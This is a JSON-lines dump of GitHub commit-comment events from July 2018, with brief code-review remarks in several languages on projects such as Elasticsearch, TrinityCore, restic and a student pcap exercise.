{"id":"7990306330","type":"CommitCommentEvent","actor":{"login":"patmccler"},"repo":{"name":"patmccler/NMFer"},"payload":{"comment":{"id":29767365,"position":null,"line":null,"path":null,"commit_id":"7b745b0108ed732e31beae425ea1918dbf76ad41","created_at":"2018-07-19T16:33:32Z","updated_at":"2018-07-19T16:33:32Z","author_association":"OWNER","body":"I'm 12 and what is this"}},"created_at":"2018-07-19T16:33:32Z"}
{"id":"7990307611","type":"CommitCommentEvent","actor":{"login":"RajeshNaga"},"repo":{"name":"RajeshNaga/DiagonalScrollViewPath"},"payload":{"comment":{"id":29767368,"position":null,"line":null,"path":null,"commit_id":"d4a2b015fc6f93a668a23647a9d8d213bddf2d79","created_at":"2018-07-19T16:33:48Z","updated_at":"2018-07-19T16:33:48Z","author_association":"OWNER","body":"DiagonalScrollViewPath"}},"created_at":"2018-07-19T16:33:48Z"}
{"id":"7990308771","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29767371,"position":5,"line":45,"path":"build.gradle","commit_id":"7a90352a771bf2c6679e0c9320243e7cde1a5d59","created_at":"2018-07-19T16:34:01Z","updated_at":"2018-07-19T16:34:01Z","author_association":"MEMBER","body":"Downgrade tue version please. I am not willing to update my java before J11 is released."}},"created_at":"2018-07-19T16:34:01Z"}
{"id":"7990309165","type":"CommitCommentEvent","actor":{"login":"Agent215"},"repo":{"name":"tottto45/CodeForIPAAS"},"payload":{"comment":{"id":29767372,"position":null,"line":null,"path":null,"commit_id":"1a2e084e55b8c9c593c5a85a17c0de945216fea5","created_at":"2018-07-19T16:34:07Z","updated_at":"2018-07-19T16:34:07Z","author_association":"NONE","body":"keep up the good work George! "}},"created_at":"2018-07-19T16:34:07Z"}
{"id":"7990312527","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29767380,"position":4,"line":4762,"path":"TFNetworkLayer.py","commit_id":"2263e88fe447081fb91e235ed5060a8d12c50f8f","created_at":"2018-07-19T16:34:45Z","updated_at":"2018-07-19T16:34:45Z","author_association":"MEMBER","body":"Please follow Python code formatting standards. PyCharm also should notify you about this. Don't ignore this! There should be two spaces before `#` and one space after `#`. Also, the comment should be like the one e.g. in `ConvLayer`, your comment is misleading.\r\n"}},"created_at":"2018-07-19T16:34:45Z"}
{"id":"7990313232","type":"CommitCommentEvent","actor":{"login":"Demon0no"},"repo":{"name":"wtfblub/NetspherePirates"},"payload":{"comment":{"id":29767381,"position":null,"line":null,"path":null,"commit_id":"04f387d7a9c242cacd3618653ad4211c3b4aa569","created_at":"2018-07-19T16:34:54Z","updated_at":"2018-07-19T16:34:54Z","author_association":"CONTRIBUTOR","body":"Does this rewrite fix the race condition problem I had with my last pull request? I haven't followed up on that one, because I didn't know how to fix it without rewriting a ton of the underlaying codebase.  \n  \nAlso is the rewrite still based the the same (or a similar enough) client version, or do you take a step towards newer versions of the game? I know alot of people request newer versions, but I'm just interested in preserving the old versions in a playable state."}},"created_at":"2018-07-19T16:34:54Z"}
{"id":"7990313273","type":"CommitCommentEvent","actor":{"login":"abdonrd"},"repo":{"name":"IBMResearch/code-sample"},"payload":{"comment":{"id":29767382,"position":null,"line":null,"path":null,"commit_id":"de71e288d471851f51e8a49af3f9ff797e90697f","created_at":"2018-07-19T16:34:54Z","updated_at":"2018-07-19T16:34:54Z","author_association":"MEMBER","body":"Thanks! :)"}},"created_at":"2018-07-19T16:34:54Z"}
{"id":"7990313866","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29767386,"position":5,"line":45,"path":"build.gradle","commit_id":"7a90352a771bf2c6679e0c9320243e7cde1a5d59","created_at":"2018-07-19T16:35:01Z","updated_at":"2018-07-19T16:35:01Z","author_association":"MEMBER","body":"J10 is fine"}},"created_at":"2018-07-19T16:35:01Z"}
{"id":"7990316597","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29767394,"position":13,"line":4766,"path":"TFNetworkLayer.py","commit_id":"2263e88fe447081fb91e235ed5060a8d12c50f8f","created_at":"2018-07-19T16:35:32Z","updated_at":"2018-07-19T16:35:32Z","author_association":"MEMBER","body":"I don't understand. Where do these defaults come from? Is this exactly the same default as in the official ResNet code?"}},"created_at":"2018-07-19T16:35:32Z"}
{"id":"7990316759","type":"CommitCommentEvent","actor":{"login":"cybrnook"},"repo":{"name":"jlesage/docker-handbrake"},"payload":{"comment":{"id":29767396,"position":null,"line":null,"path":null,"commit_id":"2382ffeb51b00371e7fa061861fcdd70f34e012c","created_at":"2018-07-19T16:35:33Z","updated_at":"2018-07-19T16:35:33Z","author_association":"NONE","body":"Oooooh, or maybe we create an option for large memory systems (64GB+), where we write transient to ramdisk instead of SSD/HDD, and then copy to disk once completed."}},"created_at":"2018-07-19T16:35:33Z"}
{"id":"7990317764","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"qcezwx/knigopoisk"},"payload":{"comment":{"id":29767398,"position":14,"line":14,"path":"backend/src/main/java/com/knigopoisk/demo/MyBookController.java","commit_id":"1aa827ae3d024721e038a19ac3230e89ed0f919e","created_at":"2018-07-19T16:35:45Z","updated_at":"2018-07-19T16:35:45Z","author_association":"NONE","body":"Лучше ещё указать http-метод - `method = RequestMethod.GET`\r\nСейчас метод mapping для всех http-методов"}},"created_at":"2018-07-19T16:35:45Z"}
{"id":"7990318706","type":"CommitCommentEvent","actor":{"login":"domzae"},"repo":{"name":"domzae/bigdebuffs"},"payload":{"comment":{"id":29767400,"position":56,"line":235,"path":"BigDebuffs.lua","commit_id":"b7adc90d64296c5fea5d0f4f832d1dbd657edc5e","created_at":"2018-07-19T16:35:56Z","updated_at":"2018-07-19T16:35:56Z","author_association":"OWNER","body":"not sure if this one is actually needed, just noticed a different spell id on change notes (don't have a hunter)"}},"created_at":"2018-07-19T16:35:56Z"}
{"id":"7990319886","type":"CommitCommentEvent","actor":{"login":"jakhax"},"repo":{"name":"jakhax/smart-home"},"payload":{"comment":{"id":29767404,"position":null,"line":null,"path":null,"commit_id":"cd7ac3b3f67a18be2df06f315a50be8c65400ebb","created_at":"2018-07-19T16:36:11Z","updated_at":"2018-07-19T16:36:11Z","author_association":"OWNER","body":"there was a merge conflict with the raspbery/views.py file in the gpio_pins and master branches"}},"created_at":"2018-07-19T16:36:11Z"}
{"id":"7990320864","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29767405,"position":5,"line":45,"path":"build.gradle","commit_id":"7a90352a771bf2c6679e0c9320243e7cde1a5d59","created_at":"2018-07-19T16:36:21Z","updated_at":"2018-07-19T16:36:21Z","author_association":"MEMBER","body":"I am not going to argue with you but respect it please."}},"created_at":"2018-07-19T16:36:21Z"}
{"id":"7990323894","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"qcezwx/knigopoisk"},"payload":{"comment":{"id":29767410,"position":14,"line":14,"path":"backend/src/main/java/com/knigopoisk/demo/MyBookController.java","commit_id":"1aa827ae3d024721e038a19ac3230e89ed0f919e","created_at":"2018-07-19T16:36:57Z","updated_at":"2018-07-19T16:36:57Z","author_association":"NONE","body":"Чтобы эндпоинт можно было запрашивать с других доменов, нужен http-заголовок Access-Control-Allow-Origin: *"}},"created_at":"2018-07-19T16:36:57Z"}
{"id":"7990327477","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29767417,"position":null,"line":null,"path":null,"commit_id":"0afa50c0e9e70b51c8961e169f02d6aed759837f","created_at":"2018-07-19T16:37:38Z","updated_at":"2018-07-19T16:37:38Z","author_association":"COLLABORATOR","body":"@stephensj2 : I wanted to change the indentation for the generated Python files from 2 spaces to 4 - I hope this is the right line to change, and that I haven't broken anything. \r\n\r\n@pauldhein : I renamed the Jupyter notebook to `Program Analysis Kickoff Demo.ipynb`"}},"created_at":"2018-07-19T16:37:38Z"}
{"id":"7990328926","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"qcezwx/knigopoisk"},"payload":{"comment":{"id":29767418,"position":14,"line":14,"path":"backend/src/main/java/com/knigopoisk/demo/MyBookController.java","commit_id":"1aa827ae3d024721e038a19ac3230e89ed0f919e","created_at":"2018-07-19T16:37:55Z","updated_at":"2018-07-19T16:37:55Z","author_association":"NONE","body":"В спринге можно использовать аннотацию `@CrossOrigin`"}},"created_at":"2018-07-19T16:37:55Z"}
{"id":"7990344920","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29767445,"position":7,"line":407,"path":"src/server/game/Handlers/SpellHandler.cpp","commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T16:41:01Z","updated_at":"2018-07-19T16:41:01Z","author_association":"MEMBER","body":"Packet modding would just have the spell fail with \"cannot cast on this target\" or w/e, same thing that happens if downrank cannot be found."}},"created_at":"2018-07-19T16:41:01Z"}
{"id":"7990345660","type":"CommitCommentEvent","actor":{"login":"JuliaSoboleva"},"repo":{"name":"wbaumann/SmartReceiptsLibrary"},"payload":{"comment":{"id":29767448,"position":null,"line":null,"path":null,"commit_id":"0eff9437831f0c4f7bb478f577f9088cf97ba488","created_at":"2018-07-19T16:41:09Z","updated_at":"2018-07-19T16:41:09Z","author_association":"CONTRIBUTOR","body":"@wbaumann Oh, great! Thank you for informing me :)"}},"created_at":"2018-07-19T16:41:09Z"}
{"id":"7990351803","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29767460,"position":null,"line":null,"path":null,"commit_id":"f9380f8a5f4c6bf58b688c8927cd43c9b367b5da","created_at":"2018-07-19T16:42:21Z","updated_at":"2018-07-19T16:42:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fix the edit-view route when refreshing page, because the note does not get fetched in time to set the state for the form components](https://trello.com/c/hvAomEjP/18-fix-the-edit-view-route-when-refreshing-page-because-the-note-does-not-get-fetched-in-time-to-set-the-state-for-the-form-compone)"}},"created_at":"2018-07-19T16:42:21Z"}
{"id":"7990352229","type":"CommitCommentEvent","actor":{"login":"kaneplusplus"},"repo":{"name":"kaneplusplus/stat_agg"},"payload":{"comment":{"id":29767462,"position":null,"line":null,"path":null,"commit_id":"439299be304eb723722adf51fbc870e56f42c97c","created_at":"2018-07-19T16:42:26Z","updated_at":"2018-07-19T16:42:26Z","author_association":"OWNER","body":"Shoot. Thanks. The change has been pushed.\r\n\r\nThanks very much!"}},"created_at":"2018-07-19T16:42:26Z"}
{"id":"7990353125","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29767465,"position":57,"line":201,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-19T16:42:38Z","updated_at":"2018-07-19T16:42:38Z","author_association":"NONE","body":"+1"}},"created_at":"2018-07-19T16:42:38Z"}
{"id":"7990360806","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29767483,"position":19,"line":19,"path":"test/testcases/sameline/if_after_assign_with_blocks_issue_42.hxtest","commit_id":"e15103a5188f61cf52b7189cca0d4c3d372e5bc7","created_at":"2018-07-19T16:44:12Z","updated_at":"2018-07-19T16:44:12Z","author_association":"MEMBER","body":"Hm.. Actually, this isn't how I expected it to be formatted. :) I think the bodies have curly braces, they should probably always be broken up into several lines? E.g. https://github.com/vshaxe/haxe-languageserver/blob/7b255aed55ceefe1228d6114c65d8e370cfbf384/src/haxeLanguageServer/tokentree/DocumentSymbolsResolver.hx#L78-L84"}},"created_at":"2018-07-19T16:44:12Z"}
{"id":"7990361816","type":"CommitCommentEvent","actor":{"login":"jlesage"},"repo":{"name":"jlesage/docker-handbrake"},"payload":{"comment":{"id":29767486,"position":null,"line":null,"path":null,"commit_id":"2382ffeb51b00371e7fa061861fcdd70f34e012c","created_at":"2018-07-19T16:44:24Z","updated_at":"2018-07-19T16:44:24Z","author_association":"OWNER","body":"What would be the benefit?"}},"created_at":"2018-07-19T16:44:24Z"}
{"id":"7990362160","type":"CommitCommentEvent","actor":{"login":"guido99"},"repo":{"name":"rhboot/efivar"},"payload":{"comment":{"id":29767487,"position":null,"line":null,"path":null,"commit_id":"6d9763483d86c135b9fcc05b021f566d27b80e94","created_at":"2018-07-19T16:44:28Z","updated_at":"2018-07-19T16:44:28Z","author_association":"NONE","body":"This patch fixes the problem on my Lenovo T540p!\r\nNice. Thanks to lcp."}},"created_at":"2018-07-19T16:44:28Z"}
{"id":"7990368334","type":"CommitCommentEvent","actor":{"login":"ruuda"},"repo":{"name":"travis-ci/travis-conditions"},"payload":{"comment":{"id":29767499,"position":13,"line":20,"path":"README.md","commit_id":"cc54d095d5d11e5c02e47e86323ca8f6ec103c1c","created_at":"2018-07-19T16:45:42Z","updated_at":"2018-07-19T16:45:42Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-19T16:45:42Z"}
{"id":"7990371090","type":"CommitCommentEvent","actor":{"login":"MichalStrehovsky"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29767504,"position":35,"line":35,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"f4f50636eb1fef9b8fc646a668e3befe6502c4dd","created_at":"2018-07-19T16:46:16Z","updated_at":"2018-07-19T16:46:16Z","author_association":"NONE","body":"`CORINFO_RESOLVED_TOKEN` is a rather big structure so we tend to pass it by reference."}},"created_at":"2018-07-19T16:46:16Z"}
{"id":"7990375697","type":"CommitCommentEvent","actor":{"login":"akavel"},"repo":{"name":"tgulacsi/g-wiki"},"payload":{"comment":{"id":29767516,"position":null,"line":null,"path":null,"commit_id":"bef9c631b05c6f5f830008a1cde8b5b5385c805a","created_at":"2018-07-19T16:47:13Z","updated_at":"2018-07-19T16:47:13Z","author_association":"NONE","body":"Did the author of the original g-wiki give you permission to change the license? If not, then this change seems to look like a straightforward violation of the GPL license of the project you forked. Do you understand how the GPL license works? Is there some important explanation that you forgot to write up in the commit message? This doesn't look good at a first glance."}},"created_at":"2018-07-19T16:47:13Z"}
{"id":"7990375753","type":"CommitCommentEvent","actor":{"login":"mpsrig"},"repo":{"name":"restic/restic"},"payload":{"comment":{"id":29767517,"position":37,"line":640,"path":"cmd/restic/global.go","commit_id":"fe99340e408f55a270096f08f68a2f0e2a6629c3","created_at":"2018-07-19T16:47:13Z","updated_at":"2018-07-19T16:47:13Z","author_association":"NONE","body":"created #1896 "}},"created_at":"2018-07-19T16:47:13Z"}
{"id":"7990376674","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29767518,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-19T16:47:25Z","updated_at":"2018-07-19T16:47:25Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T16:47:25Z"}
{"id":"7990377764","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767520,"position":11,"line":11,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:47:39Z","updated_at":"2018-07-19T16:47:39Z","author_association":"OWNER","body":"6으로 수정하였습니다."}},"created_at":"2018-07-19T16:47:39Z"}
{"id":"7990378965","type":"CommitCommentEvent","actor":{"login":"jeannotlanglois"},"repo":{"name":"SIPp/sipp"},"payload":{"comment":{"id":29767523,"position":null,"line":null,"path":null,"commit_id":"72787867018cf5130edabc3cbe2025a432a5a8f4","created_at":"2018-07-19T16:47:52Z","updated_at":"2018-07-19T16:47:52Z","author_association":"CONTRIBUTOR","body":"Pulled latest master git branch.\r\nBuilt latest sources from master branch.\r\nConfirmed version number is back to 3.6.\r\n(y)"}},"created_at":"2018-07-19T16:47:52Z"}
{"id":"7990379940","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767527,"position":22,"line":22,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:48:04Z","updated_at":"2018-07-19T16:48:04Z","author_association":"OWNER","body":"인자에 따라 처리하지는 않았지만 1개의 함수 내에서 처리하도록 수정하였습니다."}},"created_at":"2018-07-19T16:48:04Z"}
{"id":"7990380341","type":"CommitCommentEvent","actor":{"login":"BarnabasExplorer"},"repo":{"name":"BarnabasExplorer/smartcity-201807-fv"},"payload":{"comment":{"id":29767529,"position":null,"line":null,"path":null,"commit_id":"4f7a3d9b9a1361f1bfe180fd6187f8349911f2c0","created_at":"2018-07-19T16:48:09Z","updated_at":"2018-07-19T16:48:09Z","author_association":"OWNER","body":"https://cad.onshape.com/documents/0d3d07f390f4fa2c05416ee5/w/333ad2967923025e4a36488c/e/116dca22d5aefd84d10d1047\r\nOnshape File links"}},"created_at":"2018-07-19T16:48:09Z"}
{"id":"7990381364","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767533,"position":58,"line":58,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:48:21Z","updated_at":"2018-07-19T16:48:21Z","author_association":"OWNER","body":"한 개의 함수 내에서 모두 출력하도록 수정하였습니다."}},"created_at":"2018-07-19T16:48:21Z"}
{"id":"7990382519","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767536,"position":87,"line":87,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:48:34Z","updated_at":"2018-07-19T16:48:34Z","author_association":"OWNER","body":"한 개의 함수에서 처리하도록 수정하였습니다."}},"created_at":"2018-07-19T16:48:34Z"}
{"id":"7990383064","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29767539,"position":15,"line":59,"path":"src/jrd/Attachment.cpp","commit_id":"be02a9f67c0172b969f96643527c84dd007ddc8c","created_at":"2018-07-19T16:48:41Z","updated_at":"2018-07-19T16:48:41Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-19T16:48:41Z"}
{"id":"7990385513","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767544,"position":147,"line":147,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:49:09Z","updated_at":"2018-07-19T16:49:09Z","author_association":"OWNER","body":"MAC Address 부분 12바이트 + IP header의 길이 + 16바이트까지만 dump를 출력하도록 수정하였습니다."}},"created_at":"2018-07-19T16:49:09Z"}
{"id":"7990386773","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29767550,"position":69,"line":213,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-19T16:49:24Z","updated_at":"2018-07-19T16:49:24Z","author_association":"NONE","body":"I'll take a look at the latest.."}},"created_at":"2018-07-19T16:49:24Z"}
{"id":"7990389411","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767554,"position":150,"line":150,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:49:55Z","updated_at":"2018-07-19T16:49:55Z","author_association":"OWNER","body":"'0x08 0x00'이라는 값을 확인하는 부분을 추가하였습니다."}},"created_at":"2018-07-19T16:49:55Z"}
{"id":"7990389656","type":"CommitCommentEvent","actor":{"login":"tbrooks8"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29767556,"position":50,"line":439,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicenseService.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T16:49:58Z","updated_at":"2018-07-19T16:49:58Z","author_association":"NONE","body":"It feels weird to me that we do not propagate the trial version. I understand in the method, `licenseState.update`, the trial version will not be used if the operation mode is MISSING. But I still think we should not randomly stop propagating the trial version as it might give the idea to future \"readers\" of the code that trial version only matters if you are currently on a trial. Trial version == null means they have never started a trial (in a post 6.0 world).\r\n\r\n(Trial version is persistent metadata that indicate if you are eligible to start a trial - once per major version)."}},"created_at":"2018-07-19T16:49:58Z"}
{"id":"7990392067","type":"CommitCommentEvent","actor":{"login":"tbrooks8"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29767559,"position":60,"line":453,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicenseService.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T16:50:23Z","updated_at":"2018-07-19T16:50:23Z","author_association":"NONE","body":"Same comment about making trial version null here."}},"created_at":"2018-07-19T16:50:23Z"}
{"id":"7990392257","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767561,"position":152,"line":152,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:50:25Z","updated_at":"2018-07-19T16:50:25Z","author_association":"OWNER","body":"IP Header 내에서 프로토콜 부분을 참조하여 TCP인지 확인하는 부분을 추가하였습니다."}},"created_at":"2018-07-19T16:50:25Z"}
{"id":"7990394142","type":"CommitCommentEvent","actor":{"login":"tbrooks8"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29767563,"position":32,"line":287,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T16:50:46Z","updated_at":"2018-07-19T16:50:46Z","author_association":"NONE","body":"Same comment about making trial version null here."}},"created_at":"2018-07-19T16:50:46Z"}
{"id":"7990394258","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29767564,"position":null,"line":null,"path":null,"commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T16:50:47Z","updated_at":"2018-07-19T16:50:47Z","author_association":"OWNER","body":"main.o 및 pcap_test 파일을 삭제하였습니다."}},"created_at":"2018-07-19T16:50:47Z"}
{"id":"7990394944","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29767566,"position":null,"line":null,"path":null,"commit_id":"4b79d450574c0adfa44f58940b7212c7fd1d84d0","created_at":"2018-07-19T16:50:54Z","updated_at":"2018-07-19T16:50:54Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Salesforce missing a lead for adoption form submitted with multiple books](https://trello.com/c/UR7JMNaH/786-salesforce-missing-a-lead-for-adoption-form-submitted-with-multiple-books)"}},"created_at":"2018-07-19T16:50:54Z"}
{"id":"7990398501","type":"CommitCommentEvent","actor":{"login":"shfkddlgpqls"},"repo":{"name":"MagicBean1/magicBean"},"payload":{"comment":{"id":29767570,"position":null,"line":null,"path":null,"commit_id":"cb8e01add7ec60c96a9f698ffdee894e7d1be431","created_at":"2018-07-19T16:51:33Z","updated_at":"2018-07-19T16:51:33Z","author_association":"CONTRIBUTOR","body":"  test.txt 파일 삭제"}},"created_at":"2018-07-19T16:51:33Z"}
{"id":"7990400855","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29767579,"position":null,"line":null,"path":null,"commit_id":"c80d9458b598fedb19fc8ef490964fedbc442bb8","created_at":"2018-07-19T16:52:01Z","updated_at":"2018-07-19T16:52:01Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [tika118](https://tika118-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/external-libraries](https://tika118-static-docs.pantheonsite.io/docs/external-libraries)\n"}},"created_at":"2018-07-19T16:52:01Z"}
{"id":"7990408831","type":"CommitCommentEvent","actor":{"login":"spartam72"},"repo":{"name":"spartam72/alumnis"},"payload":{"comment":{"id":29767597,"position":1,"line":1,"path":"content/images/students/NASSER","commit_id":"bcfe3fff904a1e3e39df5755230192592c985f5b","created_at":"2018-07-19T16:53:38Z","updated_at":"2018-07-19T16:53:38Z","author_association":"OWNER","body":"mesprojets"}},"created_at":"2018-07-19T16:53:38Z"}
{"id":"7990412445","type":"CommitCommentEvent","actor":{"login":"dabear"},"repo":{"name":"NightscoutFoundation/xDrip"},"payload":{"comment":{"id":29767608,"position":21,"line":99,"path":"app/src/main/java/com/eveningoutpost/dexdrip/MegaStatus.java","commit_id":"c9b74eed0f4ea85bc449ec8df0da3ac4b44049e9","created_at":"2018-07-19T16:54:21Z","updated_at":"2018-07-19T16:54:21Z","author_association":"NONE","body":"Isn't this counter intuitive? A variable called g5 with the value of a6? "}},"created_at":"2018-07-19T16:54:21Z"}
{"id":"7990413301","type":"CommitCommentEvent","actor":{"login":"amcmullan"},"repo":{"name":"amcmullan/dice-roller"},"payload":{"comment":{"id":29767611,"position":null,"line":null,"path":null,"commit_id":"0ee74c6586c32bbf3ccda2b875cfca9d37b87f30","created_at":"2018-07-19T16:54:31Z","updated_at":"2018-07-19T16:54:31Z","author_association":"OWNER","body":"I've discovered how to append the contents of an array to a paragraph and/or a <div> box\r\n\r\ndocument.createElement() //for instance: var para = document.createElement(\"p\"); to create a set of <p></p> tags\r\n\r\ndocument.createTextNode(\"\") // for instance: var node = document.createTextNode(dice); to create a chunk of text, in this case the contents of the dice array\r\n\r\ndocument.getElementById // for instance: var element = document.getElementById(\"div1\"); to create a hook to a div box with the id=\"div1\" for use with the big one that follows\r\n\r\nvar.appendChild() // for instance para.appendChild(node) appending the contents of node to the paragraph => element.appendChild(para) which then appends the paragraph to div1"}},"created_at":"2018-07-19T16:54:31Z"}
{"id":"7990416927","type":"CommitCommentEvent","actor":{"login":"MichalStrehovsky"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29767617,"position":31,"line":32,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T16:55:16Z","updated_at":"2018-07-19T16:55:16Z","author_association":"NONE","body":"CanInline feels like a service that we should probably expose on the general purpose `Compilation` class. Then `canInline` on `JitInterface` can be fully shared (with the implementation difference being in `RyuJitCompilation`/`ReadyToRunCompilation`)."}},"created_at":"2018-07-19T16:55:16Z"}
{"id":"7990418270","type":"CommitCommentEvent","actor":{"login":"kipit"},"repo":{"name":"Evaneos/le-truc"},"payload":{"comment":{"id":29767620,"position":5,"line":89,"path":"_posts/2018-07-18-lister-un-gros-repertoire.md","commit_id":"48b12aa378f919c5c72de7d56499c33f20a1988a","created_at":"2018-07-19T16:55:32Z","updated_at":"2018-07-19T16:55:32Z","author_association":"NONE","body":"Juste un truc que j’avais loupé: pas besoin de spécifier `1>`. Cela suffit:\r\n```\r\n❯ \\/bin/ls -f1 > ./mon-fichier.txt\r\n```\r\nLa sortie standard étant le descripteur par défaut, tu verras rarement (jamais) écrit `1>`.\r\nLa seule fois ou c’est explicit, c’est sur la redirection d’un descripteur vers un autre. Par exemple :\r\n`some_cmd > ./a_file_with_mixed_stdout_and_error 2>&1`"}},"created_at":"2018-07-19T16:55:32Z"}
{"id":"7990418845","type":"CommitCommentEvent","actor":{"login":"theodelrieu"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767622,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T16:55:39Z","updated_at":"2018-07-19T16:55:39Z","author_association":"CONTRIBUTOR","body":"I think it would be better to make it a partial specialization, to handle `basic_json<...>`"}},"created_at":"2018-07-19T16:55:39Z"}
